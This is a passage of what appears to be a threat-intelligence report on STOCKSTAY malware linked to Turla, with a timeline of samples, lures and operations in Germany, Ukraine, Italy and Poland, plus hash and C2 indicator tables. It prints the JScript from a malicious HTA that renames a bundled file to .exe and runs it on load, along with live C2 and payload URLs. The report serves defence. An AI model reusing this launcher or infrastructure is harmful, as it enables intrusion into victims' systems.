      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig5.max-1000x1000.png" alt="Timeline of STOCKSTAY observations">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="qw6cr">Figure 5: Timeline of STOCKSTAY observations</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>December 2022</span></h4>
<p><span>The version of the open-source websocket-sharp.dll bundled with the majority of observed STOCKSTAY.STOCKBROKER samples was last modified, according to timestamp information in MSI files and ZIP archives containing STOCKSTAY. Although built from an open-source library, this specific instance appears to have been compiled by the actor themselves, thus creating a uniquely identifiable artifact with which to track this malware’s continuous development.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>websocket-sharp.dll</code></p>
</td>
<td>
<p><span>Instance of open-source library used by the threat actor</span></p>
</td>
<td>
<p><code>d1e54270433a94aa3d45d888e4c62299bee3480eb2cb4a5489c7dda69d476c3e</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 5: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>September 21, 2023: Germany</span></h4>
<p><span>An early version of STOCKSTAY was uploaded to VirusTotal from Germany, under the filename “DriversPrinterGraphic.rar”. From the archive’s timestamps, it appears as though the sample was submitted within 20 minutes of being created, likely indicating this was submitted by the malware’s developer.</span></p>
<p><span>This version predates the malware’s separation into distinct role-based components, instead incorporating all core functionality into a single executable: StockMarketNews.exe. Additionally, this version of STOCKSTAY contained the user interface shown in Figure 6, which enables viewing/editing of configuration options and command messages, while still presenting as a stock market utility.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig6.max-1000x1000.png" alt="Early STOCKSTAY user-interface">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="qw6cr">Figure 6: Early STOCKSTAY user-interface</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>This particular STOCKSTAY sample uses a slightly different configuration file format; however, the underlying configuration options are consistent with later versions. This sample also utilizes environmental keying for its configuration file; using the lower-cased hostname of the intended target as the decryption password. GTIG has been unable to recover the password at this time.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>DriversPrinterGraphic.rar</code></p>
</td>
<td>
<p><span>RAR archive containing STOCKSTAY</span></p>
</td>
<td>
<p><code>e6d8192960a89d5480868b94088cccdaa1560f9c8a0b0282ced2b7c1f72341b6</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketNews.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY combined executable</span></p>
</td>
<td>
<p><code>1fc23ec18a94a599a34c74ef5f49a1e27acd37a07d5846661702b5e7e81a6a24</code></p>
</td>
</tr>
<tr>
<td>
<p><code>sample.conf</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>1a2ca8b8e0344fe3d80da7352206a470245443e2349a237bc093df934ddc011f</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 6: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>December 5 – 6, 2023: Netherlands</span></h4>
<p><span>A further RAR archive containing STOCKSTAY was submitted to VirusTotal at 2023-12-06 08:52:49 from the Netherlands, under the filename “apps_libwallets_v1.3.rar”. This archive was last modified the previous day at 2023-12-05 16:47:42. This pattern may indicate that the archive was created by the individual at the end of their working day, and then submitted the following day when they returned to the office.</span></p>
<p><span>This instance of STOCKSTAY was the first case observed by GTIG of the malware’s core functionality being separated into distinct role-based components, using the filenames shown in Table 7.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Component</strong></p>
</td>
<td>
<p><strong>Filename</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKMARKET</span></p>
</td>
<td>
<p><span>StockMarketView.exe</span></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKBROKER</span></p>
</td>
<td>
<p><span>StockMarketNet.exe</span></p>
</td>
</tr>
<tr>
<td>
<p><span>STOCKSTAY.STOCKTRADER</span></p>
</td>
<td>
<p><span>StockMarketSystem.exe</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 7: STOCKSTAY component filenames observed in December 2023</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><p><span>Similar to the sample observed in September 2023, this instance of STOCKSTAY also used environmental keying, however this instance used the target computer’s domain name as the configuration password. GTIG has been unable to recover the password at this time.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>apps_libwallets_v1.3.rar</code></p>
</td>
<td>
<p><span>RAR archive containing STOCKSTAY components</span></p>
</td>
<td>
<p><code>81aabf646619ea5f4a72457cd3aa17c5988003d67e6454f45e7cb33613021bac</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketView.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKMARKET orchestrator</span></p>
</td>
<td>
<p><code>9164054d0bf0b7c8820da4f742860940998984555e65820e4fa8dd07b6bd67ec</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketNet.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler</span></p>
</td>
<td>
<p><code>34fcbe7e90fc87a4f3766469c19a64f24672d7adb99e0198f5ba10d58911368b</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketSystem.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKTRADER backdoor</span></p>
</td>
<td>
<p><code>0a545dd1b703cddfb3d582c8c70f65f556bbd580bfa836a387121eb837bda61b</code></p>
</td>
</tr>
<tr>
<td>
<p><code>default.conf</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>2623c6e3c1f5a7b5e735a64813bc0e1382ae45831f5fadffb08c0e7b096627f7</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 8: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>January 2024: Ukraine</span></h4>
<p><span>GTIG conducted a review of an incident response conducted by Mandiant relating to a late-2023 compromise of a Ukrainian organization, in which we observed Turla deploying a wide range of tools into the victim’s network, including WILDDAY, DIAMONDBACK and KAZUAR, via malicious GPO installation from a compromised domain controller. This activity was accompanied by other simple scripts and backdoors to deploy malware across multiple machines in the infected organization. </span></p>
<p><span>During the review, GTIG identified evidence of STOCKSTAY execution on one of the hosts impacted by the infected domain controller. Multiple ZIP archives, each containing one of the core components of STOCKSTAY or its configuration, were uploaded to the domain controller. The files were found in a directory used for staging registry files used to install WILDDAY both prior to and after STOCKSTAY appeared on the host, as well as for staging output from an otherwise unknown Powershell backdoor (iclsClient.ps1) which was also observed running from the domain controller.</span></p>
<p><span>During this operation, an initial STOCKSTAY configuration file was deployed to the domain controller alongside the STOCKSTAY core component executables, however this file was not able to be decrypted using any known passwords or environmental identifiers. A short while later, Mandiant observed a second configuration file being deployed to the domain controller, this time encrypted using the domain name associated with the compromised network. GTIG assesses with moderate confidence that the deployment of the initial configuration file was either a mistake by the threat actor - perhaps deploying a configuration file associated with a different victim - or the result of a default or invalid configuration file being bundled with STOCKSTAY during initial deployment to prevent sensitive C2 details from being captured in the event of early detection of the malware in the victim’s environment.  </span></p>
<p><span>The successfully decrypted configuration defined a STOCKSTAY WebSocket C2 URL of </span><code>wss://wool-basalt-clock.glitch.me/ws</code><span>. Additionally, the configuration specified an operational time-frame of Monday to Friday between the hours of 0900 and 1800 on the victim's system. This time-based restriction is likely intended to blend C2 communications with normal business operations in the victim's network. This same time-frame has been observed in a majority of STOCKSTAY configuration files analyzed by GTIG.</span></p>
<p><span>Of particular note, toward the end of this operation, Mandiant identified firewall detections relating to one of KAZUAR’s C2 endpoints. GTIG assesses, with low to moderate confidence, that the threat actor could have been aware of the suspicion surrounding its C2 and deployed STOCKSTAY as a failsafe in case KAZUAR was identified and remediated, thus enabling reinfection at a later date, in the event that STOCKSTAY remained undetected.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://wool-basalt-clock.glitch.me/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 9: Network indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>February 2024: Italy</span></h4>
<p><span>An MSI file configured to install STOCKSTAY was uploaded to VirusTotal at 2024-02-20 11:45:26 from Italy, under the filename “Copia.msi”. The MSI masqueraded as the </span><span>ILSpy application developed by ICSharpCodeTeam, and contained a large number of legitimate benign components. The MSI installed the core STOCKSTAY components under </span><code>%LOCALAPPDATA%/Programs/SMN/</code><span>, and enabled persistent execution via registry run keys. </span></p>
<p><span>The STOCKSTAY samples contained in the MSI were compiled between January 29 and January 31, 2024, with the configuration file last being modified on February 13, 2024, just a week before being submitted to VirusTotal.</span></p>
<p><span>In addition to the installation of STOCKSTAY, the MSI file contains a custom MSI action named “OpenUrl”. This action has the sequence number 1 in the InstallUISequence table, indicating it should be executed before any other actions. The custom action is configured to execute the following command:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>viewer.exe
https://circoloesteri.elezioni.idnet.it/admin-election/riepilogo.php</code></pre></div>
<div class="block-paragraph_advanced"><p><span>When viewed, the URL contains references to elections (“elezioni”) and the Italian organization “Circolo Degli Esteri”, which according to their official website (</span><a href="https://www.circoloesteri.it/" rel="noopener" target="_blank"><span>https://www.circoloesteri.it/</span></a><span>), was founded to “represent the Ministry of Foreign Affairs”. We do not currently assess that the actor was directly targeting Italian elections, and was instead using elections-related phishing lures to target victims. Due to limited visibility, we have been unable to identify any earlier stages of this particular operation, and cannot confirm the identity of the intended targets of any potential related phishing campaigns.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Foreign Affairs Club 1936

Approval of the 2023 Financial Statement

Analysis of the status of those registered to vote (automatically updates every 60 seconds)...
update 6:26:50

Total Voters: 915
Currently registered members with 2-tonte status: 364
Currently registered with status 4 Ready to vote: 5
Currently registered with status 3 - Voted 46
Voter turnout (votes cast on registered voters): 5.03%</code></pre></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig7.max-1000x1000.png" alt="Italian-language decoy claiming to relate to Italy’s Circolo Degli Esteri">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ugoq7">Figure 7: Italian-language decoy claiming to relate to Italy’s Circolo Degli Esteri</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>Although inconclusive, this appears to indicate an intention to deploy STOCKSTAY against Italian-speaking individuals or organizations, specifically with a focus on foreign affairs.</span></p>
<p><span>In following with previous STOCKSTAY instances, this sample utilized environmental keying for its configuration file. GTIG was able to recover the domain name used to decrypt the configuration file in order to identify the WebSocket C2 address </span><code>wss://wool-basalt-clock.glitch.me/ws</code><span>. This matches the C2 address used in January 2024.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>Copia.msi</code></p>
</td>
<td>
<p><span>MSI containing STOCKSTAY components</span></p>
</td>
<td>
<p><code>b064a3efb04ed77e6c57955089ce639e193d166c8ea2216c98c3e9b701ea2cff</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketView.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKMARKET orchestrator</span></p>
</td>
<td>
<p><code>82707cfdf24dcb762f4615f01e1ba4d3dfdec4abe9cd588558d2634d7e6a5eeb</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketNet.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler</span></p>
</td>
<td>
<p><code>249a4c7cacdd8e99a2a089a5c0ce904f2eff22e0e40fcfb10f7824dca6c51ecb</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketSystem.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKTRADER backdoor</span></p>
</td>
<td>
<p><code>b728eba4f0d6d16602fbad05a591f14391594262d3584b2e249e97f86e4dcc5a</code></p>
</td>
</tr>
<tr>
<td>
<p><code>default.conf</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>40b1208dda0cd5dd95c6b57764b2cfe7145b3ed9457f498408b4aaa05bf3ef50</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 10: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>https://circoloesteri.elezioni.idnet.it/admin-election/riepilogo.php</code></p>
</td>
<td>
<p><span>Italian language lure relating to voting on matters related to the Italian Ministry of Foreign Affairs.</span></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://wool-basalt-clock.glitch.me/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 11: Network indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>March 18 – April 3, 2025: Ukraine</span></h4>
<p><span>On April 2, 2025, GTIG identified a compromised email account sending a phishing email containing a message purporting to originate from a Ukrainian university, relating to the testing of a new distance learning environment. The threat actor attached a malicious Remote Desktop Protocol (RDP) file to the email, which upon opening resulted in a connection being established between the victim and an open RDP port (3389) hosted on the actor-registered domain chosen to imitate the same academic institution. </span></p>
<p><span>Once the victim connected to the actor's infrastructure, GTIG observed the actor deploying STOCKSTAY.MARKETMAKER to the client. STOCKSTAY.MARKETMAKER was configured to download a ZIP containing STOCKSTAY from a legitimate but compromised website belonging to the State Regulatory Service of Ukraine. In contrast to the majority of earlier observations, the configuration file observed during this operation was protected with a hard-coded password. This appears to correspond with this particular operation’s focus on initial access to a victim’s environment via spear-phishing, through which the specific domain or host name may not be known to the threat actor, and thus cannot be used for environmental keying. GTIG was able to identify the malware using the WebSocket C2 URL </span><code>wss://weatherdataai.theworkpc.com/ws</code><span>.</span></p>
<p><span>According to the metadata associated with the ZIP archive downloaded by STOCKSTAY.MARKETMAKER, the core STOCKSTAY components used during this operation were last modified between March 18 – 26, with the configuration file last being modified on March <span>31</span>.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>MicrosoftUpdateOneDrive.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.MARKETMAKER Downloader</span></p>
</td>
<td>
<p><code>da8a96bc74e265f945f1cc6992c6dc0f9ea36ed1991f7b8d312db79d9bf78c40</code></p>
</td>
</tr>
<tr>
<td>
<p><code>docs.zip</code></p>
</td>
<td>
<p><span>ZIP archive containing STOCKSTAY components</span></p>
</td>
<td>
<p><code>9fe944147c15a87963b06baf6473288d64c23655a0ba9369c35566272d8efc73</code></p>
</td>
</tr>
<tr>
<td>
<p><code>SMEditor.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKTRADER backdoor</span></p>
</td>
<td>
<p><code>e1d16fb635060d23e889b0617d77f0cf06d00cc19b43a2c8b5ac53ac027ac722</code></p>
</td>
</tr>
<tr>
<td>
<p><code>SMNet.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler</span></p>
</td>
<td>
<p><code>dfd5cb91d06b9649d4cab500343af80ad1144a9e46641cc406f43dd169003c22</code></p>
</td>
</tr>
<tr>
<td>
<p><code>StockMarketView.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKMARKET orchestrator</span></p>
</td>
<td>
<p><code>2af7b513c05e76d7da5f75bb0a223c894a706c99ef2c2ddfe4eae542f95a08e0</code></p>
</td>
</tr>
<tr>
<td>
<p><code>fonts</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>40a3b969d81ef1ef35dd9ebcc6774e060b1b8949d3d74f38ca6b7d789c95cdb3</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 12: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>https://www.drs.gov.ua/wp-content/themes/twentytwentyfive/docs.zip</code></p>
</td>
<td>
<p><span>Compromised State Regulatory Service of Ukraine infrastructure serving ZIP archive containing STOCKSTAY components</span></p>
</td>
</tr>
<tr>
<td>
<p><code>wss://weatherdataai.theworkpc.com/ws</code></p>
</td>
<td>
<p><span>STOCKSTAY WebSocket C2</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 13: Network indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>May 14, 2025: Poland</span></h4>
<p><span>GTIG identified two samples of STOCKSTAY.STOCKBROKER being uploaded to VirusTotal on May </span>14, 2025 from Poland. </p>
<p><span>The first sample, named “ClientMNGR2.exe”, matched previously observed versions, however the second sample, named “GR3.exe”, was heavily obfuscated using large quantities of junk code, and a previously unknown string obfuscation mechanism. GTIG tracks this obfuscation mechanism as K1MORPHER, and we have since observed its inclusion in all core STOCKSTAY components, and within select samples of KAZUAR; increasing our confidence that STOCKSTAY exists within the same development ecosystem as other malware leveraged by Turla.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>ClientMNGR2.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler obfuscated with K1MORPHER</span></p>
</td>
<td>
<p><code>d3fd32f915c239872c9e7ed9408b1f36dfcef03aa68f9a396d05c437667cdb43</code></p>
</td>
</tr>
<tr>
<td>
<p><code>GR3.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler obfuscated with K1MORPHER</span></p>
</td>
<td>
<p><code>98ce3c6e4dd05887ea619f2bbfeb2e2c2805ed07e85e119b79b828b7ef8be397</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 14: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><h4><span>May 28 – August 8, 2025: Ukraine </span><span>— </span><span>Deployment via Malicious HTA</span></h4>
<p><span>On August 8, 2025, GTIG identified a RAR archive, “calculator.rar”, being submitted to VirusTotal. The archive had been hosted on compromised infrastructure belonging to a Ukrainian IT company since at least July 22, 2025. The archive contained a malicious HTA file named “Калькулятор грошового забезпечення військовослужбовців 2025.hta” (translation: "Military personnel cash benefit calculator 2025.hta"). The HTA was designed to execute a variant of the STOCKSTAY.MARKETMAKER downloader, which was also included in the archive, using the code shown in Figure 9.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig8.max-1000x1000.png" alt="Lure HTML page displayed by Калькулятор грошового забезпечення військовослужбовців 2025.hta">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="j8j2f">Figure 8: Lure HTML page displayed by Калькулятор грошового забезпечення військовослужбовців 2025.hta</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>&lt;script language="JScript"&gt;
  function renameAndRunFile() {
    try {
      var oldName = "calculator_2025_files\\styles.dat";
      var newName = "calculator_2025_files\\styles.dat.exe";

      var fso = new ActiveXObject("Scripting.FileSystemObject");

      if (fso.FileExists(oldName)) {
        if (fso.FileExists(newName)) {
          fso.DeleteFile(newName);
        }
        fso.MoveFile(oldName, newName);

        var shell = new ActiveXObject("WScript.Shell");
        shell.Run('"' + newName + '"', 1, false);
      } else {
      }

    } catch (e) {
    }
  }

window.onload = function() {
  renameAndRunFile();
};
&lt;/script&gt;</code></pre>
<p><span><span>Figure 9: JavaScript code contained in Калькулятор грошового забезпечення військовослужбовців 2025.hta</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>The STOCKSTAY.MARKETMAKER variant retrieved a ZIP archive, “EditorToolsPdf.zip”, containing the core STOCKSTAY components from a second compromised server located in Ukraine, this time hosting the archive within a compromised WordPress instance. </span></p>
<p><span>Analysis of the modification timestamps within the military calculator lure archive show that this operation dated as far back as May <span>28,</span> 2025, when the majority of the contents of the “calculator_2025_files” folder were last modified. The STOCKSTAY.MARKETMAKER executable was last modified on June 5, 2025, and the malicious HTA file was modified on June 10, 2025. </span></p>
<p><span>Similar examination of the STOCKSTAY archive shows the configuration file being modified on June 4, 2025, while the archive itself was last modified on the compromised server on June 5, 2025. This series of events shows that the complete STOCKSTAY ZIP archive was staged on the compromised infrastructure while modifications were being made to the initial phishing lures.</span></p>
<p><span>GTIG has been able to confirm via a trusted third party that the original compromise of the Ukrainian server used to host the STOCKSTAY archive occurred on or before May <span>13,</span> 2025.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Filename</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
<td>
<p><strong>SHA-256</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>calculator.rar</code></p>
</td>
<td>
<p><span>RAR archive containing STOCKSTAY components</span></p>
</td>
<td>
<p><code>6da0b4c1a5d0d3fb6e6a2990a82ba51db1f68a3bba818baa46526a29731e2342</code></p>
</td>
</tr>
<tr>
<td>
<p><code>Калькулятор грошового забезпечення військовослужбовців 2025.hta</code></p>
</td>
<td>
<p><span>HTA lure </span></p>
<p><span>(translated filename: “Military personnel cash benefit calculator 2025.hta”)</span></p>
</td>
<td>
<p><code>0d6b083208097d5b3e189891338540f6c64faaaaf268b0bb0b085dd53d5857b4</code></p>
</td>
</tr>
<tr>
<td>
<p><code>styles.dat.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.MARKETMAKER downloader</span></p>
</td>
<td>
<p><code>626330d22f77d9cbca9d40cc06568041703f194610c4c5a84bbb05a2e4ee7459</code></p>
</td>
</tr>
<tr>
<td>
<p><code>EditorToolsPdf.zip</code></p>
</td>
<td>
<p><span>ZIP archive containing STOCKSTAY components</span></p>
</td>
<td>
<p><code>447f430b46fad5a3f8e8c5aad1f8f7f79af069489c3d9c29224bb9f14f0c7bf4</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ViewPdf.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKMARKET orchestrator</span></p>
</td>
<td>
<p><code>45bb8d1ab2c13bf4354294e13d3c9be15de625d807301905b98462f43f93e893</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ClientMNGR.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKBROKER tunneler</span></p>
</td>
<td>
<p><code>80f6c010fd260d0bcf18a4b6a8d62505adbed50d2e615ed9522c4bfd61c00661</code></p>
</td>
</tr>
<tr>
<td>
<p><code>ConverterDDSNet.exe</code></p>
</td>
<td>
<p><span>STOCKSTAY.STOCKTRADER backdoor</span></p>
</td>
<td>
<p><code>55249f296b63a8bcf911b8bc96de43c1ac2b4a56c150a19d33d892a47e57352c</code></p>
</td>
</tr>
<tr>
<td>
<p><code>fonts</code></p>
</td>
<td>
<p><span>STOCKSTAY configuration file</span></p>
</td>
<td>
<p><code>e3364ee21cae6725451e8bc9ab9933df0000fd19814170bd132da68d1906d5ff</code></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><span>Table 15: File indicators</span></span></p>
</div></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Indicator</strong></p>
</td>
<td>
<p><strong>Description</strong></p>
</td>
</tr>
<tr>
<td>
<p><code>https://basecon.com.ua/calculator.rar</code></p>
</td>
<td>
<p><span>RAR archive containing HTA lure and STOCKSTAY.MARKETMAKER downloader</span></p>
</td>
</tr>
<tr>
<td>
<p><code>https://online.zp.ua/wp-content/uploads/Tools/EditorToolsPdf.zip</code></p>
